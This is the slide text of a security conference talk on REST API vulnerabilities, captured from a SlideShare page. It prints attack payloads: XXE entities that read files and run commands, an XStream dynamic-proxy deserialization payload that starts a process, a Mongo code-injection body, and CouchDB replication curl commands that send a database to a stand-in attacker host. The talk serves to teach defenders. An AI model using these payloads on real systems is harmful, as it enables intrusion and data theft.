SlideShare uma empresa Scribd logo

Asec r01-resting-on-your-laurels-will-get-you-pwned

Dinis Cruz
Dinis Cruz

Public REST APIs have become mainstream. Now, almost every company that wants to expose services or an application programming interface does it using a publicly exposed REST API. This talk will give participants the skills they need to identify and understand REST vulnerabilities. The findings are a result of reviewing production REST applications as well as researching popular REST frameworks. By Dinis Cruz, Abraham Kang and Alvaro Muñoz

Tecnologia
1 de 50
Baixar para ler offline
SESSION ID: RESTing on Your Laurels Will Get You Pwnd ASEC-R01 Abraham Kang Director Engineering Samsung @KangAbraham Alvaro Muñoz Sanchez Senior Security Researcher HP Fortify @pwntester Dinis Cruz (in absentia) Principal Security Engineer Security Innovation @DinisCruz
#RSAC Goals and Main Point  Originally a 2 hour presentation so we will only be focusing on identifying remote code execution and data exfiltration vulnerabilities through REST APIs.  Remember that a REST API is nothing more than a web application which follows a structured set of rules.  So all of the previous application vulnerabilities still apply: SQL Injection, XSS, Direct Object Reference, Command Injection, etc.  We are going to show you how remote code execution and data filtration manifest themselves in REST APIs.
#RSAC REST History  Introduced to the world in a PHD dissertation by Roy Fielding in 2000.  Promoted the idea of using HTTP methods (PUT, POST, GET, DELETE) and the URL itself to communicate additional metadata as to the nature of an HTTP request.  GET http://svr.com/customers/123  POST http://svr.com/customers/123
#RSAC Causes of REST Vulnerabilities  Location in the trusted network of your data center  SSRF (Server Side Request Forgery) to Internal REST APIs  URLs to backend REST APIs are built with concatenation instead of URIBuilder (Prepared URI)  Self describing nature  Inbred Architecture  Incorrect assumptions of application behavior  Input types and interfaces  Extensions in REST frameworks that enhance development of REST functionality at the expense of security
#RSAC Attacking An Internal Network (REST style)  Find an HTTP REST proxy w/ vulns  Figure out which REST based systems are running on the internal network  Exfiltrate data from the REST interface of the backend system or GET RCE on internal REST API  What backend systems have a REST API:  ODATA in MS SQL Server  Beehive and OAE RESTful API  Neo4j, Mongo, Couch, Cassandra, Hbase, your company, and many more X Non-compromised machine Y Affected machine SAPRESTAPI SAP AS5 … PubRESTAPI Mongo Couch Neo4j Cassan HBase …REST API REST API REST API REST API REST API REST API REST EAI EII ESB
#RSAC SSRF (Server Side Request Forgery) to Internal REST APIs  Public REST Services attack Internal REST services (in the DMZ)  Enablers: RFI (Remote File Inclusion) through PHP include(), REST framework specific proxy (RESTlet Redirector), XXE, WS-* protocols, etc.  Causes: Concatenation in URLs built to connect to internal REST services or arbitrary xml loaded by server  Many internal REST APIs are using basic auth over SSL. So you can use the same attacks above to find the basic auth credentials on the file system and embed them in the URL:  http://user:password@internalSvr.com/xxx...
#RSAC What to Look For  new URL (“http://yourSvr.com/value” + var);  new Redirector(getContext(), urlFromCookie, MODE_SERVER_OUTBOUND );  HttpGet(“http://yourSvr.com/value” + var);  HttpPost(“http://yourSvr.com/value” + var);  restTemplate.postForObject( ”http://localhost:8080/Rest/user/” + var, request, User.class );  ...
#RSAC HPP (HTTP Parameter Pollution)  HPP (HTTP Parameter Pollution) was discovered by Stefano di Paola and Luca Carettoni in 2009. It utilized the discrepancy in how duplicate request parameters were processed to override application specific default values in URLs. Typically attacks utilized the “&” character to fool backend services in accepting attacker controlled request parameters.
#RSAC Extended HPPP (HTTP Path & Parameter Pollution)  Extended HPPP utilizes matrix and path parameters, JSON injection and path segment characters to change the underlying semantics of a REST URL request.  “#” can be used to remove ending URL characters similar to “--” in SQL Injection and “//” in JavaScript Injection  “../” can be used to change the overall semantics of the REST request in path based APIs (vs query parameter based)  “;” can be used to add matrix parameters to the URL at different path segments  The “_method” query parameter can be used to change a GET request to a PUT, DELETE, and sometimes a POST (if there is a bug in the REST API)  Special framework specific query parameters allow enhanced access to backend data through REST API. The “qt” parameter in Apache Solr  JSON Injection is also used to provide the necessary input to the application receiver.
#RSAC Faking Out Security Filters (Scenario) User • Hacker Security Filter/Servlet • Allows GET requests for public but POST, PUT and DELETE for only admin users • /creditInfo REST Service • Provides credit info
#RSAC Faking Out Security Filters (Bypass) User • Hacker • “_method” parameter • “X-HTTP-Method- Override” header Security Filter/Servlet • Looks like a GET but turns into PUT, POST, or DELETE • creditInfo?_method=PUT REST Service • Updates credit info
#RSAC Extended HPPP (Apply Your Knowledge I) String entity = request.getParameter(“entity”); String id = request.getParameter(“id”); URL urlGET = new URL(“http://svr.com:5984/client/” + entity + “?id=“ + id ); Change it to a POST to the following URL http://svr.com:5984/admin User App Server Calls Backend REST Service
#RSAC Extended HPPP (Apply Your Knowledge I) String entity = request.getParameter(“entity”); String id = request.getParameter(“id”); URL urlGET = new URL(“http://svr.com:5984/client/” + “../admin” + “?id=“ + “1&_method=POST” ); Change it to a POST to the following URL http://svr.com:5984/admin User App Server Calls Backend REST Service
#RSAC REST is Self Describing and Predictable  What URL would you first try when gathering information about a REST API and the system that backs it?
#RSAC REST is Self Describing  What URL would you first try when gathering information about a REST API and the system that backs it?  http://host:port/  Compare this to:  Select * from all_tables (in Oracle)  sp_msforeachdb 'select "?" AS db, * from [?].sys.tables' (SQL Server)  SELECT DISTINCT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE COLUMN_NAME IN ('columnA','ColumnB') AND TABLE_SCHEMA='YourDatabase'; (My SQL)  Etc.
#RSAC Especially for NoSQL REST APIs  All of the following DBs have REST APIs which closely follow their database object structures  HBase  Couch DB  Mongo DB  Cassandra.io  Neo4j
#RSAC HBase REST API  Find all the tables in the Hbase Cluster:  http://host:9000/  Find the running HBase version:  http://host:9000/version  Find the nodes in the HBase Cluster:  http://host:9000/status/cluster  Find a description of a particular table’s schema(pick one from the prior link):  http://host:port/profile/schema
#RSAC Inbred Architecture  Externally exposed REST APIs typically use the same communication protocol (HTTP) and REST frameworks that are used in internal only REST APIs.  Any vulnerabilities which are present in the public REST API can be used against the internal REST APIs.
#RSAC Incorrect assumptions of REST application behavior  People still thinking web when developing public REST APIs:  http://www.svr.com/view_profile?id=12345  http://www.srv.com/credit_report?user_id=123-45-6789  http://www.abc.com/find_friends?phone_nums=410-555-1212,310-123-4567  REST provides for dynamic URLs and dynamic resource allocation
#RSAC REST provides for dynamic URLs and dynamic resource allocation Example Case Study  You have an Mongo DB REST API which exposes two databases which can only be accessed at /realtime/* and /predictive/*  There are two static ACLs which protect all access to each of these databases <web-resource-name>Realtime User</web-resource-name> <url-pattern>/realtime/*</url-pattern> <web-resource-name>Predictive Analysis User</web-resource-name> <url-pattern>/predicitive/*</url-pattern> Can anyone see the problem? You should be able to own the server with as little disruption to the existing databases.
#RSAC Example Case Study Exploit  The problem is not in the two databases. The problem is that you are working with a REST API and resources are dynamic.  So POST to the following url to create a new database called test which is accessible at “/test”: POST http://svr.com:27080/test  Then POST the following: POST http://svr.com:27080/test/_cmd  With the following body: cmd={…, “$reduce”:”function (obj, prev) { malicious_code() }” …
#RSAC REST Input Types and Interfaces  Does anyone know what the main input types are to REST interfaces?
#RSAC REST Input Types and Interfaces  Does anyone know what the main input types are to REST interfaces?  XML and JSON
#RSAC XML Related Vulnerabilities  When you think of XML--what vulnerabilities come to mind?
#RSAC XML Related Vulnerabilities  When you think of XML--what vulnerabilities come to mind?  XXE (eXternal XML Entity Injection) / SSRF (Server Side Request Forgery)  XSLT Injection  XDOS  XML Injection  XML Serialization
#RSAC XXE (File Disclosure and Port Scanning)  Most REST interfaces take raw XML to de-serialize into method parameters of request handling classes.  XXE Example when the name element is echoed back in the HTTP response to the posted XML which is parsed whole by the REST API: <?xml encoding=“utf-8” ?> <!DOCTYPE Customer [<!ENTITY y SYSTEM ‘../WEB-INF/web.xml’> ]> <Customer> <name>&y;</name> </Customer> *See Attacking <?xml?> processing by Nicolas Gregoire (Agarri) and XML Out-of-Band Data Retrieval by Timur Yunusov and Alexey Osipov
#RSAC XXE (Remote Code Execution)  Most REST interfaces take raw XML to de-serialize into method parameters of request handling classes.  XXE Example when the name element is echoed back in the HTTP response to the posted XML which is parsed whole by the REST API: <?xml encoding=“utf-8” ?> <!DOCTYPE Customer [<!ENTITY y SYSTEM ‘expect://ls’> ]> <Customer> <name>&y;</name> </Customer> *See XXE: advanced exploitation, d0znpp, ONSEC *expect protocol requires pexpect module to be loaded in PHP *joernchen has another example at https://gist.github.com/joernchen/3623896
#RSAC XXE Today  At one time most REST frameworks were vulnerable to XXE  But newer versions have patched this vulnerability  XXE on SpringMVC last summer  XEE on Restlet last month  XXE on Jboss Seam recently  …
#RSAC XML Serialization Vulnerabilities  Every REST API allows the raw input of XML to be converted to native objects. This deserialization process can be used to execute arbitrary code on the REST server.
#RSAC Understanding XML Serialization  Mainly Three Mechanisms Used by Server Logic  Server looks where to go before going  Create an object based on the target type defined in the application then assign values from the xml to that instance  Server asks user where to go  Create and object based on a user specified type in the provided XML then assign values (to public or private fields) from the xml to that instance, finally cast the created object to the target type defined in the application  Server asks user where to go and what to do  Create and object based on a user specified type in the provided XML then assign values from the xml to that instance, allow object assignments and invoke arbitrary methods on the newly created instance, finally cast the created object to the target type defined in the application
#RSAC Vulnerable XML Serialization APIs  In our research we found one API that “asks the user where to go”:  XStream  More limited  Cannot invoke methods  Relies on existing APIs to trigger the code execution  And another that “asks the user where to go and what to do”:  XMLDecoder  Unrestricted  Execute arbitrary methods on newly created objects which are defined in the input  Near Turing complete
#RSAC XML Serialization RCE – Restlet/XMLDecoder
#RSAC XML Serialization RCE – Restlet/XMLDecoder
#RSAC XML Serialization RCE – Restlet/XMLDecoder Demo
#RSAC XML Serialization RCE – SpringMVC/XStream  XStream is not exactly a marshaller as it allows full object serialization  http://xstream.codehaus.org/converters.html contains a complete list of objects that can be serialized  One interesting class: DynamicProxyConverter
#RSAC What is a DynamicProxy again?  A way to intercept method calls on an interface and inject custom code Class field1 field2 method1 method2 method3
#RSAC What is a DynamicProxy again?  A way to intercept method calls on an interface and inject custom code Class filed1 field2 method1 method2 method3 Interface method1 method2
#RSAC Custom code What is a DynamicProxy again?  A way to intercept method calls on an interface and inject custom code Class filed1 field2 method1 method2 method3 Interface method1 method2 Proxy
#RSAC Turning a Feature into a Bug  Attacker’s plan: • Find out what Class the XML will be deserialized to • Create a proxy for that Class the WebService is waiting for • Intercept/hook any call to any method in the interface • Replace the original call with the malicious payload • Send the serialized version of the proxy • Cross-fingers • Profit
#RSAC The wall is the SERVER …… and believe it or not this man is a dynamic proxy!
#RSAC Exploit <contact> <id>1</id> <firstName>john</firstName> <lastName>smith</lastName> <email>john@gmail.com</email> </contact>
#RSAC Exploit <dynamic-proxy> <interface>org.company.model.Contact</interface> <handler class="java.beans.EventHandler"> <target class="java.lang.ProcessBuilder"> <command><string>calc.exe</string></command> </target> <action>start</action> </handler> </dynamic-proxy> <contact> <id>1</id> <firstName>john</firstName> <lastName>smith</lastName> <email>john@gmail.com</email> </contact>
#RSAC XML Serialization RCE – SpringMVC/XStream Demo
#RSAC JSON Serialization  ODATA  … { “type” : “namespace.Class”, “arbtraryAttr” : “attackerProvidedValue”, … }  Ruby on Rails  { “json_class” : “package::Class”, “arbtraryAttr” : “attackerProvidedValue”, … }  JSON.NET  { “$type” : “namespace.Class”, “arbtraryAttr” : “attackerProvidedValue”, … }  Other frameworks work similarly
#RSAC Extensions in REST frameworks that enhance development of REST functionality at the expense of security  Turns remote code execution and data exfiltration from a security vulnerability into a feature.  In some cases it is subtle:  Passing in partial script blocks used in evaluating the processing of nodes.  Passing in JavaScript functions which are used in map-reduce processes.  In others it is more obvious:  Passing in a complete Groovy script which is executed as a part of the request on the server. Gremlin Plug-in for Neo4j.  Passing in the source and target URLs for data replication
#RSAC Rest Extensions Data Exfiltration Example (Couch DB)  curl –vX POST http://internalSrv.com:5984/_replicate –d ‘{“source”:”db_name”, “target”:”http://attackerSvr.com:5984/corpData”}’ –H “Content-Type: application/json”  curl –vX POST http://srv.com:5984/_replicate –d ‘{“source”:”http://anotherInternalSvr.com:5984/db”, “target”:”http://attackerSvr.com:5984/corpData”}’ –H “Content-Type: application/json”
#RSAC Rest Extensions Data Exfiltration Apply Your Knowledge(Couch DB) String id = request.getParameter(“id”); URL urlPost = new URL(“http://svr.com:5984/customers/” + id); String name = request.getParameter(“name”); String json = “{”fullName”:”” + name + “”}”; How can you exfiltrate the data given the above?
#RSAC Rest Extensions Data Exfiltration Apply Your Knowledge(Couch DB) String id = request.getParameter(“id”); URL url = new URL(“http://svr.com:5984/customers/../_replicate”); String name = request.getParameter(“name”); String json = “{”fullName”:”X”, ”source”:”customers”, ”target”:”http://attackerSvr.com:5984/corpData”}”; Attacker provides: id = “../_replicate” name = ‘X”, “source”:”customers”, “target”:”http://attackerSvr.com:5984/corpData’
#RSAC Conclusion  Publically exposed and/or internal REST APIs ease integration but can be fraught with risk.  This talk gave you exposure to some of the common problems in REST based applications.
#RSAC Questions/Call To Action ? Abe: @KangAbraham Alvaro: @pwntester Dinis: @DinisCruz

Recomendados

SecDevOps - The Operationalisation of Security
SecDevOps - The Operationalisation of SecuritySecDevOps - The Operationalisation of Security
SecDevOps - The Operationalisation of Security
Dinis Cruz
 
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...
Christian Schneider
 
SecDevOps
SecDevOpsSecDevOps
SecDevOps
Peter Lamar
 
Spring Framework - Spring Security
Spring Framework - Spring SecuritySpring Framework - Spring Security
Spring Framework - Spring Security
Dzmitry Naskou
 
Spring Security
Spring SecuritySpring Security
Spring Security
Manish Sharma
 
Spring security 2017
Spring security 2017Spring security 2017
Spring security 2017
Vortexbird
 
How to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid themHow to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid them
Masoud Kalali
 
Security in practice with Java EE 6 and GlassFish
Security in practice with Java EE 6 and GlassFishSecurity in practice with Java EE 6 and GlassFish
Security in practice with Java EE 6 and GlassFish
Markus Eisele
 

Recomendados

SecDevOps - The Operationalisation of Security
SecDevOps - The Operationalisation of SecuritySecDevOps - The Operationalisation of Security
SecDevOps - The Operationalisation of Security
Dinis Cruz
 
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...
Christian Schneider
 
SecDevOps
SecDevOpsSecDevOps
SecDevOps
Peter Lamar
 
Spring Framework - Spring Security
Spring Framework - Spring SecuritySpring Framework - Spring Security
Spring Framework - Spring Security
Dzmitry Naskou
 
Spring Security
Spring SecuritySpring Security
Spring Security
Manish Sharma
 
Spring security 2017
Spring security 2017Spring security 2017
Spring security 2017
Vortexbird
 
How to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid themHow to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid them
Masoud Kalali
 
Security in practice with Java EE 6 and GlassFish
Security in practice with Java EE 6 and GlassFishSecurity in practice with Java EE 6 and GlassFish
Security in practice with Java EE 6 and GlassFish
Markus Eisele
 
Security Architecture of the Java Platform (BG OUG, Plovdiv, 13.06.2015)
Security Architecture of the Java Platform (BG OUG, Plovdiv, 13.06.2015)Security Architecture of the Java Platform (BG OUG, Plovdiv, 13.06.2015)
Security Architecture of the Java Platform (BG OUG, Plovdiv, 13.06.2015)
Martin Toshev
 
OWASP AppSec EU - SecDevOps, a view from the trenches - Abhay Bhargav
OWASP AppSec EU - SecDevOps, a view from the trenches - Abhay BhargavOWASP AppSec EU - SecDevOps, a view from the trenches - Abhay Bhargav
OWASP AppSec EU - SecDevOps, a view from the trenches - Abhay Bhargav
Abhay Bhargav
 
Continuous Integration - Live Static Analysis with Puma Scan
Continuous Integration - Live Static Analysis with Puma ScanContinuous Integration - Live Static Analysis with Puma Scan
Continuous Integration - Live Static Analysis with Puma Scan
Puma Security, LLC
 
Javacro 2014 Spring Security 3 Speech
Javacro 2014 Spring Security 3 SpeechJavacro 2014 Spring Security 3 Speech
Javacro 2014 Spring Security 3 Speech
Fernando Redondo Ramírez
 
Deep dive into Java security architecture
Deep dive into Java security architectureDeep dive into Java security architecture
Deep dive into Java security architecture
Prabath Siriwardena
 
Octopus framework; Permission based security framework for Java EE
Octopus framework; Permission based security framework for Java EEOctopus framework; Permission based security framework for Java EE
Octopus framework; Permission based security framework for Java EE
Rudy De Busscher
 
ADDRESSING TOMORROW'S SECURITY REQUIREMENTS IN ENTERPRISE APPLICATIONS
ADDRESSING TOMORROW'S SECURITY REQUIREMENTS IN ENTERPRISE APPLICATIONSADDRESSING TOMORROW'S SECURITY REQUIREMENTS IN ENTERPRISE APPLICATIONS
ADDRESSING TOMORROW'S SECURITY REQUIREMENTS IN ENTERPRISE APPLICATIONS
elliando dias
 
Java Security
Java SecurityJava Security
Java Security
elliando dias
 
Just Enough Threat Modeling
Just Enough Threat ModelingJust Enough Threat Modeling
Just Enough Threat Modeling
Stephen de Vries
 
Spring Security
Spring SecuritySpring Security
Spring Security
Boy Tech
 
Spring Security 5
Spring Security 5Spring Security 5
Spring Security 5
Jesus Perez Franco
 
Automating security tests for Continuous Integration
Automating security tests for Continuous IntegrationAutomating security tests for Continuous Integration
Automating security tests for Continuous Integration
Stephen de Vries
 
Java Secure Coding Practices
Java Secure Coding PracticesJava Secure Coding Practices
Java Secure Coding Practices
OWASPKerala
 
Security Аrchitecture of Тhe Java Platform
Security Аrchitecture of Тhe Java PlatformSecurity Аrchitecture of Тhe Java Platform
Security Аrchitecture of Тhe Java Platform
Martin Toshev
 
Security in Java
Security in JavaSecurity in Java
Security in Java
Siddharth Coontoor
 
Four Times Microservices - REST, Kubernetes, UI Integration, Async
Four Times Microservices - REST, Kubernetes, UI Integration, AsyncFour Times Microservices - REST, Kubernetes, UI Integration, Async
Four Times Microservices - REST, Kubernetes, UI Integration, Async
Eberhard Wolff
 
Building Layers of Defense with Spring Security
Building Layers of Defense with Spring SecurityBuilding Layers of Defense with Spring Security
Building Layers of Defense with Spring Security
Joris Kuipers
 
Extending Arquillian graphene
Extending Arquillian graphene Extending Arquillian graphene
Extending Arquillian graphene
Rudy De Busscher
 
Access Control Pitfalls v2
Access Control Pitfalls v2Access Control Pitfalls v2
Access Control Pitfalls v2
Jim Manico
 
Web hackingtools cf-summit2014
Web hackingtools cf-summit2014Web hackingtools cf-summit2014
Web hackingtools cf-summit2014
ColdFusionConference
 
Resting on your laurels will get you powned
Resting on your laurels will get you pownedResting on your laurels will get you powned
Resting on your laurels will get you powned
Dinis Cruz
 
Creating Web Services with Zend Framework - Matthew Turland
Creating Web Services with Zend Framework - Matthew TurlandCreating Web Services with Zend Framework - Matthew Turland
Creating Web Services with Zend Framework - Matthew Turland
Matthew Turland
 

Mais conteúdo relacionado

Mais procurados

OWASP AppSec EU - SecDevOps, a view from the trenches - Abhay Bhargav
OWASP AppSec EU - SecDevOps, a view from the trenches - Abhay BhargavOWASP AppSec EU - SecDevOps, a view from the trenches - Abhay Bhargav
OWASP AppSec EU - SecDevOps, a view from the trenches - Abhay Bhargav
Abhay Bhargav
 
ADDRESSING TOMORROW'S SECURITY REQUIREMENTS IN ENTERPRISE APPLICATIONS
ADDRESSING TOMORROW'S SECURITY REQUIREMENTS IN ENTERPRISE APPLICATIONSADDRESSING TOMORROW'S SECURITY REQUIREMENTS IN ENTERPRISE APPLICATIONS
ADDRESSING TOMORROW'S SECURITY REQUIREMENTS IN ENTERPRISE APPLICATIONS
elliando dias
 

Mais procurados (20)

Security Architecture of the Java Platform (BG OUG, Plovdiv, 13.06.2015)
Security Architecture of the Java Platform (BG OUG, Plovdiv, 13.06.2015)Security Architecture of the Java Platform (BG OUG, Plovdiv, 13.06.2015)
Security Architecture of the Java Platform (BG OUG, Plovdiv, 13.06.2015)
 
OWASP AppSec EU - SecDevOps, a view from the trenches - Abhay Bhargav
OWASP AppSec EU - SecDevOps, a view from the trenches - Abhay BhargavOWASP AppSec EU - SecDevOps, a view from the trenches - Abhay Bhargav
OWASP AppSec EU - SecDevOps, a view from the trenches - Abhay Bhargav
 
Continuous Integration - Live Static Analysis with Puma Scan
Continuous Integration - Live Static Analysis with Puma ScanContinuous Integration - Live Static Analysis with Puma Scan
Continuous Integration - Live Static Analysis with Puma Scan
 
Javacro 2014 Spring Security 3 Speech
Javacro 2014 Spring Security 3 SpeechJavacro 2014 Spring Security 3 Speech
Javacro 2014 Spring Security 3 Speech
 
Deep dive into Java security architecture
Deep dive into Java security architectureDeep dive into Java security architecture
Deep dive into Java security architecture
 
Octopus framework; Permission based security framework for Java EE
Octopus framework; Permission based security framework for Java EEOctopus framework; Permission based security framework for Java EE
Octopus framework; Permission based security framework for Java EE
 
ADDRESSING TOMORROW'S SECURITY REQUIREMENTS IN ENTERPRISE APPLICATIONS
ADDRESSING TOMORROW'S SECURITY REQUIREMENTS IN ENTERPRISE APPLICATIONSADDRESSING TOMORROW'S SECURITY REQUIREMENTS IN ENTERPRISE APPLICATIONS
ADDRESSING TOMORROW'S SECURITY REQUIREMENTS IN ENTERPRISE APPLICATIONS
 
Java Security
Java SecurityJava Security
Java Security
 
Just Enough Threat Modeling
Just Enough Threat ModelingJust Enough Threat Modeling
Just Enough Threat Modeling
 
Spring Security
Spring SecuritySpring Security
Spring Security
 
Spring Security 5
Spring Security 5Spring Security 5
Spring Security 5
 
Automating security tests for Continuous Integration
Automating security tests for Continuous IntegrationAutomating security tests for Continuous Integration
Automating security tests for Continuous Integration
 
Java Secure Coding Practices
Java Secure Coding PracticesJava Secure Coding Practices
Java Secure Coding Practices
 
Security Аrchitecture of Тhe Java Platform
Security Аrchitecture of Тhe Java PlatformSecurity Аrchitecture of Тhe Java Platform
Security Аrchitecture of Тhe Java Platform
 
Security in Java
Security in JavaSecurity in Java
Security in Java
 
Four Times Microservices - REST, Kubernetes, UI Integration, Async
Four Times Microservices - REST, Kubernetes, UI Integration, AsyncFour Times Microservices - REST, Kubernetes, UI Integration, Async
Four Times Microservices - REST, Kubernetes, UI Integration, Async
 
Building Layers of Defense with Spring Security
Building Layers of Defense with Spring SecurityBuilding Layers of Defense with Spring Security
Building Layers of Defense with Spring Security
 
Extending Arquillian graphene
Extending Arquillian graphene Extending Arquillian graphene
Extending Arquillian graphene
 
Access Control Pitfalls v2
Access Control Pitfalls v2Access Control Pitfalls v2
Access Control Pitfalls v2
 
Web hackingtools cf-summit2014
Web hackingtools cf-summit2014Web hackingtools cf-summit2014
Web hackingtools cf-summit2014
 

Semelhante a Asec r01-resting-on-your-laurels-will-get-you-pwned

Creating Web Services with Zend Framework - Matthew Turland
Creating Web Services with Zend Framework - Matthew TurlandCreating Web Services with Zend Framework - Matthew Turland
Creating Web Services with Zend Framework - Matthew Turland
Matthew Turland
 
RESTful Web APIs – Mike Amundsen, Principal API Architect, Layer 7
RESTful Web APIs – Mike Amundsen, Principal API Architect, Layer 7RESTful Web APIs – Mike Amundsen, Principal API Architect, Layer 7
RESTful Web APIs – Mike Amundsen, Principal API Architect, Layer 7
CA API Management
 
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
ClubHack
 

Semelhante a Asec r01-resting-on-your-laurels-will-get-you-pwned (20)

Resting on your laurels will get you powned
Resting on your laurels will get you pownedResting on your laurels will get you powned
Resting on your laurels will get you powned
 
Creating Web Services with Zend Framework - Matthew Turland
Creating Web Services with Zend Framework - Matthew TurlandCreating Web Services with Zend Framework - Matthew Turland
Creating Web Services with Zend Framework - Matthew Turland
 
JAX-RS 2.0 and OData
JAX-RS 2.0 and ODataJAX-RS 2.0 and OData
JAX-RS 2.0 and OData
 
Network Device Database Management with REST using Jersey
Network Device Database Management with REST using JerseyNetwork Device Database Management with REST using Jersey
Network Device Database Management with REST using Jersey
 
LAJUG Napster REST API
LAJUG Napster REST APILAJUG Napster REST API
LAJUG Napster REST API
 
How to call REST API without knowing any programming languages
How to call REST API without knowing any programming languages How to call REST API without knowing any programming languages
How to call REST API without knowing any programming languages
 
The RESTful Soa Datagrid with Oracle
The RESTful Soa Datagrid with OracleThe RESTful Soa Datagrid with Oracle
The RESTful Soa Datagrid with Oracle
 
RESTing with JAX-RS
RESTing with JAX-RSRESTing with JAX-RS
RESTing with JAX-RS
 
Apex REST
Apex RESTApex REST
Apex REST
 
gofortution
gofortutiongofortution
gofortution
 
The Glory of Rest
The Glory of RestThe Glory of Rest
The Glory of Rest
 
RESTful Web APIs – Mike Amundsen, Principal API Architect, Layer 7
RESTful Web APIs – Mike Amundsen, Principal API Architect, Layer 7RESTful Web APIs – Mike Amundsen, Principal API Architect, Layer 7
RESTful Web APIs – Mike Amundsen, Principal API Architect, Layer 7
 
RESTful API-centric Universe
RESTful API-centric UniverseRESTful API-centric Universe
RESTful API-centric Universe
 
Ppt on web development and this has all details
Ppt on web development and this has all detailsPpt on web development and this has all details
Ppt on web development and this has all details
 
Design Summit - RESTful API Overview - John Hardy
Design Summit - RESTful API Overview - John HardyDesign Summit - RESTful API Overview - John Hardy
Design Summit - RESTful API Overview - John Hardy
 
Xamarin Workshop Noob to Master – Week 5
Xamarin Workshop Noob to Master – Week 5Xamarin Workshop Noob to Master – Week 5
Xamarin Workshop Noob to Master – Week 5
 
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
 
Slim Framework
Slim FrameworkSlim Framework
Slim Framework
 
Networked APIs with swift
Networked APIs with swiftNetworked APIs with swift
Networked APIs with swift
 
Webservices in SalesForce (part 1)
Webservices in SalesForce (part 1)Webservices in SalesForce (part 1)
Webservices in SalesForce (part 1)
 

Mais de Dinis Cruz

Mais de Dinis Cruz (20)

Map camp - Why context is your crown jewels (Wardley Maps and Threat Modeling)
Map camp - Why context is your crown jewels (Wardley Maps and Threat Modeling)Map camp - Why context is your crown jewels (Wardley Maps and Threat Modeling)
Map camp - Why context is your crown jewels (Wardley Maps and Threat Modeling)
 
Glasswall - Safety and Integrity Through Trusted Files
Glasswall - Safety and Integrity Through Trusted FilesGlasswall - Safety and Integrity Through Trusted Files
Glasswall - Safety and Integrity Through Trusted Files
 
Glasswall - How to Prevent, Detect and React to Ransomware incidents
Glasswall - How to Prevent, Detect and React to Ransomware incidentsGlasswall - How to Prevent, Detect and React to Ransomware incidents
Glasswall - How to Prevent, Detect and React to Ransomware incidents
 
The benefits of police and industry investigation - NPCC Conference
The benefits of police and industry investigation - NPCC ConferenceThe benefits of police and industry investigation - NPCC Conference
The benefits of police and industry investigation - NPCC Conference
 
Serverless Security Workflows - cyber talks - 19th nov 2019
Serverless Security Workflows - cyber talks - 19th nov 2019Serverless Security Workflows - cyber talks - 19th nov 2019
Serverless Security Workflows - cyber talks - 19th nov 2019
 
Modern security using graphs, automation and data science
Modern security using graphs, automation and data scienceModern security using graphs, automation and data science
Modern security using graphs, automation and data science
 
Using Wardley Maps to Understand Security's Landscape and Strategy
Using Wardley Maps to Understand Security's Landscape and StrategyUsing Wardley Maps to Understand Security's Landscape and Strategy
Using Wardley Maps to Understand Security's Landscape and Strategy
 
Dinis Cruz (CV) - CISO and Transformation Agent v1.2
Dinis Cruz (CV) - CISO and Transformation Agent v1.2Dinis Cruz (CV) - CISO and Transformation Agent v1.2
Dinis Cruz (CV) - CISO and Transformation Agent v1.2
 
Making fact based decisions and 4 board decisions (Oct 2019)
Making fact based decisions and 4 board decisions (Oct 2019)Making fact based decisions and 4 board decisions (Oct 2019)
Making fact based decisions and 4 board decisions (Oct 2019)
 
CISO Application presentation - Babylon health security
CISO Application presentation - Babylon health securityCISO Application presentation - Babylon health security
CISO Application presentation - Babylon health security
 
Using OWASP Security Bot (OSBot) to make Fact Based Security Decisions
Using OWASP Security Bot (OSBot) to make Fact Based Security DecisionsUsing OWASP Security Bot (OSBot) to make Fact Based Security Decisions
Using OWASP Security Bot (OSBot) to make Fact Based Security Decisions
 
GSBot Commands (Slack Bot used to access Jira data)
GSBot Commands (Slack Bot used to access Jira data)GSBot Commands (Slack Bot used to access Jira data)
GSBot Commands (Slack Bot used to access Jira data)
 
(OLD VERSION) Dinis Cruz (CV) - CISO and Transformation Agent v0.6
(OLD VERSION) Dinis Cruz (CV) - CISO and Transformation Agent v0.6 (OLD VERSION) Dinis Cruz (CV) - CISO and Transformation Agent v0.6
(OLD VERSION) Dinis Cruz (CV) - CISO and Transformation Agent v0.6
 
OSBot - Data transformation workflow (from GSheet to Jupyter)
OSBot - Data transformation workflow (from GSheet to Jupyter)OSBot - Data transformation workflow (from GSheet to Jupyter)
OSBot - Data transformation workflow (from GSheet to Jupyter)
 
Jira schemas - Open Security Summit (Working Session 21th May 2019)
Jira schemas - Open Security Summit (Working Session 21th May 2019)Jira schemas - Open Security Summit (Working Session 21th May 2019)
Jira schemas - Open Security Summit (Working Session 21th May 2019)
 
Template for "Sharing anonymised risk theme dashboards v0.8"
Template for "Sharing anonymised risk theme dashboards v0.8"Template for "Sharing anonymised risk theme dashboards v0.8"
Template for "Sharing anonymised risk theme dashboards v0.8"
 
Owasp and summits (may 2019)
Owasp and summits (may 2019)Owasp and summits (may 2019)
Owasp and summits (may 2019)
 
Creating a graph based security organisation - Apr 2019 (OWASP London chapter...
Creating a graph based security organisation - Apr 2019 (OWASP London chapter...Creating a graph based security organisation - Apr 2019 (OWASP London chapter...
